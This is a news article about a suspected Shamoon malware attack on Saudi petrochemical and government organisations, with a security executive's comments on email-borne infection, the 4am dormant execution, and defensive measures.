Saudi on alert as cyber criminals target key organisations
Experts suspect Shamoon, which paralysed Saudi Aramco operations in 2012, to be responsible
We are getting more details about a cyber attack targeting Saudi Arabia’s public and private organisations mainly in petrochemicals, which came to light yesterday.
An alert from the Saudi’s telecoms authority, seen by Reuters, advised all parties to be vigilant for potential attacks.
ITP.net sources told us that between five and ten organisations were impacted. Research shows the attack took place at 4am in the morning.
While it’s not confirmed that this is the same variant of the Shamoon malware which attacked Saudi Arabian organisations in the past, the infection patterns, file creation and lateral movement is identical to the pattern documented by Palo Alto Networks in those previous instances, our sources tell us. Shamoon crippled tens thousands of computers at oil giant Saudi Aramco in 2012.
The Labour ministry and Sadara Chemical Co. have admitted they were attacked.
It’s believed the initial infection was via an email attachment.
The malware infected systems, possibly via stolen or weak credentials, and then stayed dormant for some time until it was capable of causing maximum damage.
The virus follows the same destructive pattern as in the past where machines have their partition tables deleted and only a complete system restore will be able to recover the IT environment.
Nicolai Solling, CTO at Help AG commented: “Email has always been a major infection vector and organisations need to implement technologies and also enforce policies that safeguard against malicious email attachments.
“A successful defence is to utilise solutions such as OPSWAT Metadefender which secures emails by utilising multiple malware inspection engines and reconstructs data without potential weaponized document features. As an example, it could remove macros, scripts or calls to external applications from inside an Office document,” Solling added.
As with the attack that occurred in December 2016, this malware lay dormant and executed at 4am, when most in-house IT teams aren’t at work. This highlights the need for 24x7 monitoring of security events so as to react to and remediate them as soon as possible thereby mitigating their impact, Solling said.